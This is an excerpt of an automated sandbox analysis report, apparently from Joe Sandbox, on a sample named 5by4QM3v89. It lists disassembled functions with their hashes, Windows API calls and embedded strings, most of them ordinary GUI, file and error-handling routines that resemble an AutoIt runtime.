                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: db2f7960b7a5961d63a146eaa0a1b60b8faf503b8ecae6fafea5aaa73be9a266
                                                          • Instruction ID: 9568b5a70290760be85d2b6762fa2177ec1a9327d429c2c4903a5347a8cf4276
                                                          • Opcode Fuzzy Hash: db2f7960b7a5961d63a146eaa0a1b60b8faf503b8ecae6fafea5aaa73be9a266
                                                          • Instruction Fuzzy Hash: 01A1C331204A66AFD716DF61C884BEAB7E8FF45314F008629F999D61D0DB30F946CB92
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 003EAF18
                                                          • _wcscmp.LIBCMT ref: 003EAF29
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 003EAF51
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 003EAF6E
                                                          • _wcscmp.LIBCMT ref: 003EAF8C
                                                          • _wcsstr.LIBCMT ref: 003EAF9D
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003EAFD5
                                                          • _wcscmp.LIBCMT ref: 003EAFE5
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 003EB00C
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003EB055
                                                          • _wcscmp.LIBCMT ref: 003EB065
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 003EB08D
                                                          • GetWindowRect.USER32(00000004,?), ref: 003EB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 28783b7b4aac80f343af4f2b577401768889db7ae22c97554463e3d3517328c1
                                                          • Instruction ID: 5b260febb3f0292474e31a1e760276c7efd6d6f3a4a1bf088d3e2b12a768545c
                                                          • Opcode Fuzzy Hash: 28783b7b4aac80f343af4f2b577401768889db7ae22c97554463e3d3517328c1
                                                          • Instruction Fuzzy Hash: 2A81BF711082959FDB13DF12C885BABB7D8EF84314F04866AFD858A0D5DB30ED4ACBA1
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 0041C627
                                                            • Part of subcall function 0041AB37: ClientToScreen.USER32(?,?), ref: 0041AB60
                                                            • Part of subcall function 0041AB37: GetWindowRect.USER32(?,?), ref: 0041ABD6
                                                            • Part of subcall function 0041AB37: PtInRect.USER32(?,?,0041C014), ref: 0041ABE6
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0041C690
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0041C69B
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0041C6BE
                                                          • _wcscat.LIBCMT ref: 0041C6EE
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0041C705
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0041C71E
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0041C735
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0041C757
                                                          • DragFinish.SHELL32(?), ref: 0041C75E
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0041C851
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbE
                                                          • API String ID: 169749273-2677925638
                                                          • Opcode ID: 62f6f45f70241b7e8470304ea835d5624f6eca6e2528de2901f550b10166e155
                                                          • Instruction ID: 263c7b12dacec4bbeeeb7f049a90afd2cf48c6e478c1f99f525adffc6b966122
                                                          • Opcode Fuzzy Hash: 62f6f45f70241b7e8470304ea835d5624f6eca6e2528de2901f550b10166e155
                                                          • Instruction Fuzzy Hash: EB619E71108301AFCB01EF64DC85EAFBBE8FF89310F40492EF591961A1DB70A949CB56
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 0ca3ccdb4a189f489c14e90ccb79876d7ae2af6ae77869f47d8388c5a7d76e84
                                                          • Instruction ID: 6fbf4931552be4d5069b28ee65fb0c57fc75d27e1a583c6fc89a8c05b76cac09
                                                          • Opcode Fuzzy Hash: 0ca3ccdb4a189f489c14e90ccb79876d7ae2af6ae77869f47d8388c5a7d76e84
                                                          • Instruction Fuzzy Hash: 6731E331A48659ABEA12FB61DD03FFE7764AF10710F30062AF402B94D1EF556F04C696
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00405013
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040501E
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00405029
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00405034
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0040503F
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0040504A
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00405055
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00405060
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0040506B
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00405076
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00405081
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0040508C
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00405097
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 004050A2
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004050AD
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 004050B8
                                                          • GetCursorInfo.USER32(?), ref: 004050C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: 43082e63fa1cd918abfd170b9f53648772b6a58ec79450257a99286b63c028e7
                                                          • Instruction ID: b83d3f97502179af71ad829a0419513dc9ca1448af83c1aa25de772eff2cb1d7
                                                          • Opcode Fuzzy Hash: 43082e63fa1cd918abfd170b9f53648772b6a58ec79450257a99286b63c028e7
                                                          • Instruction Fuzzy Hash: D43101B1D483196ADF109FB68C899AFBFE8FF04750F50453BA50CE7280DA78A5018F95
                                                          APIs
                                                          • _memset.LIBCMT ref: 0041A259
                                                          • DestroyWindow.USER32(?,?), ref: 0041A2D3
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0041A34D
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0041A36F
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041A382
                                                          • DestroyWindow.USER32(00000000), ref: 0041A3A4
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00390000,00000000), ref: 0041A3DB
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041A3F4
                                                          • GetDesktopWindow.USER32 ref: 0041A40D
                                                          • GetWindowRect.USER32(00000000), ref: 0041A414
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041A42C
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0041A444
                                                            • Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: caecb069ca714c9fecbd4bef55af3d8e775e234a97ccc60e4aaad614635e309c
                                                          • Instruction ID: fe76ebd6834fd75b5de213abcc54fa1634600a41c846e797c50fd79736ef9698
                                                          • Opcode Fuzzy Hash: caecb069ca714c9fecbd4bef55af3d8e775e234a97ccc60e4aaad614635e309c
                                                          • Instruction Fuzzy Hash: 4E715770140205AFDB21DF28C849FAA7BE5FB88704F04452EF9858B2A1D778E956CB5A
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00414424
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041446F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: 85043bde84f8826f24f75024f553a25dd3cfb8c69cc03d2a72ee3d8e18be0150
                                                          • Instruction ID: 997f9f9ed97b89c870e43ce399c33b391a8aed046cb10996dd6d554ecf20121d
                                                          • Opcode Fuzzy Hash: 85043bde84f8826f24f75024f553a25dd3cfb8c69cc03d2a72ee3d8e18be0150
                                                          • Instruction Fuzzy Hash: AE91AD302043019FCB05EF14C452BAEB7E1AF95354F14886EF8965B7A2DB38EC4ACB85
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0041B8B4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004191C2), ref: 0041B910
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041B949
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0041B98C
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041B9C3
                                                          • FreeLibrary.KERNEL32(?), ref: 0041B9CF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041B9DF
                                                          • DestroyIcon.USER32(?,?,?,?,?,004191C2), ref: 0041B9EE
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0041BA0B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0041BA17
                                                            • Part of subcall function 003B2EFD: __wcsicmp_l.LIBCMT ref: 003B2F86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 42c00b809b515d526ef4d528a400c19bcd1ed6cbdd03dddaceaff066436073df
                                                          • Instruction ID: fdc7b331a3d6355fc4a2872913d85bb71bb786eb3a75923df80e23b22a7d8a89
                                                          • Opcode Fuzzy Hash: 42c00b809b515d526ef4d528a400c19bcd1ed6cbdd03dddaceaff066436073df
                                                          • Instruction Fuzzy Hash: C661CEB1510215BAEB15DF64CC41BFB7BACFB08710F10821AFA15DA1C0DB789982DBA4
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 003FDCDC
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003FDCEC
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003FDCF8
                                                          • __wsplitpath.LIBCMT ref: 003FDD56
                                                          • _wcscat.LIBCMT ref: 003FDD6E
                                                          • _wcscat.LIBCMT ref: 003FDD80
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003FDD95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDA9
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDDB
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDFC
                                                          • _wcscpy.LIBCMT ref: 003FDE08
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003FDE47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 19c7193ec9fedcb08d2fe625ce1e3fdccabfd6d60c78d535ceae1c1c5e8c20aa
                                                          • Instruction ID: cc0060a12cb1bef85dab2500c3fa9d29bfe331efe4b98973344c00949eff71b1
                                                          • Opcode Fuzzy Hash: 19c7193ec9fedcb08d2fe625ce1e3fdccabfd6d60c78d535ceae1c1c5e8c20aa
                                                          • Instruction Fuzzy Hash: 306180721042099FCB11EF24C845AAEB3E9FF89314F04492EFA99CB251DB31E945CB51
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003F9C7F
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003F9CA0
                                                          • __swprintf.LIBCMT ref: 003F9CF9
                                                          • __swprintf.LIBCMT ref: 003F9D12
                                                          • _wprintf.LIBCMT ref: 003F9DB9
                                                          • _wprintf.LIBCMT ref: 003F9DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 9ddc761a92bd0566838551adfb240e844a201f64856e0aa316b560948c09ab68
                                                          • Instruction ID: ede945ab4cb9a14f361b5e12adb32a69c3be54cba271ddb73afdfbf4d518a5fc
                                                          • Opcode Fuzzy Hash: 9ddc761a92bd0566838551adfb240e844a201f64856e0aa316b560948c09ab68
                                                          • Instruction Fuzzy Hash: A0518E32900609AADF16EBE0CD46FFEB778AF14300F600166B505760A2EB356E59DF64
                                                          APIs
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • CharLowerBuffW.USER32(?,?), ref: 003FA3CB
                                                          • GetDriveTypeW.KERNEL32 ref: 003FA418
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA460
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA497
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA4C5
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: ff44054dbe9852a24a11aa5e67be6308d2e2ab7584ab72d8a34f5700dd8e1d83
                                                          • Instruction ID: 8e620d0f157f4863250125f567a72816ab5fdb2688d5f46f737ff1f6fc2b81f0
                                                          • Opcode Fuzzy Hash: ff44054dbe9852a24a11aa5e67be6308d2e2ab7584ab72d8a34f5700dd8e1d83
                                                          • Instruction Fuzzy Hash: 19516EB11187059FDB01EF25C88196EB3E4FF94718F10886DF8999B2A1DB71ED0ACB42
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,003CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003EF8DF
                                                          • LoadStringW.USER32(00000000,?,003CE029,00000001), ref: 003EF8E8
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,003CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003EF90A
                                                          • LoadStringW.USER32(00000000,?,003CE029,00000001), ref: 003EF90D
                                                          • __swprintf.LIBCMT ref: 003EF95D
                                                          • __swprintf.LIBCMT ref: 003EF96E
                                                          • _wprintf.LIBCMT ref: 003EFA17
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EFA2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: a3bd7953e8565e057e2f52e3e5a0412885bd7f3b60cfabc859b79580ca08a607
                                                          • Instruction ID: acafb5e8fe93669336275e8e4e5755b7ee5df476e6448fd3bef893c576ae7001
                                                          • Opcode Fuzzy Hash: a3bd7953e8565e057e2f52e3e5a0412885bd7f3b60cfabc859b79580ca08a607
                                                          • Instruction Fuzzy Hash: F2414C72800219AADF16FBE0DD86EEEB778AF18300F500165F505BA0D2EB756F49CB65
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00419207,?,?), ref: 0041BA56
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA6D
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA78
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA85
                                                          • GlobalLock.KERNEL32(00000000), ref: 0041BA8E
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA9D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041BAA6
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BAAD
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BABE
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00422CAC,?), ref: 0041BAD7
                                                          • GlobalFree.KERNEL32(00000000), ref: 0041BAE7
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0041BB0B
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0041BB36
                                                          • DeleteObject.GDI32(00000000), ref: 0041BB5E
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041BB74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: d772e5bea1c654106e72a33f6d341f6f705394f47b6f65597c6378022a9b08e6
                                                          • Instruction ID: 6dff5ffd3793f6080ee96df47e893f61c94ce591bba50fd285f5be69cc79e925
                                                          • Opcode Fuzzy Hash: d772e5bea1c654106e72a33f6d341f6f705394f47b6f65597c6378022a9b08e6
                                                          • Instruction Fuzzy Hash: DE414575600208BFCB119F65DC88EEBBBB8EF89711F108069F909D7260D734AE46CB64
                                                          APIs
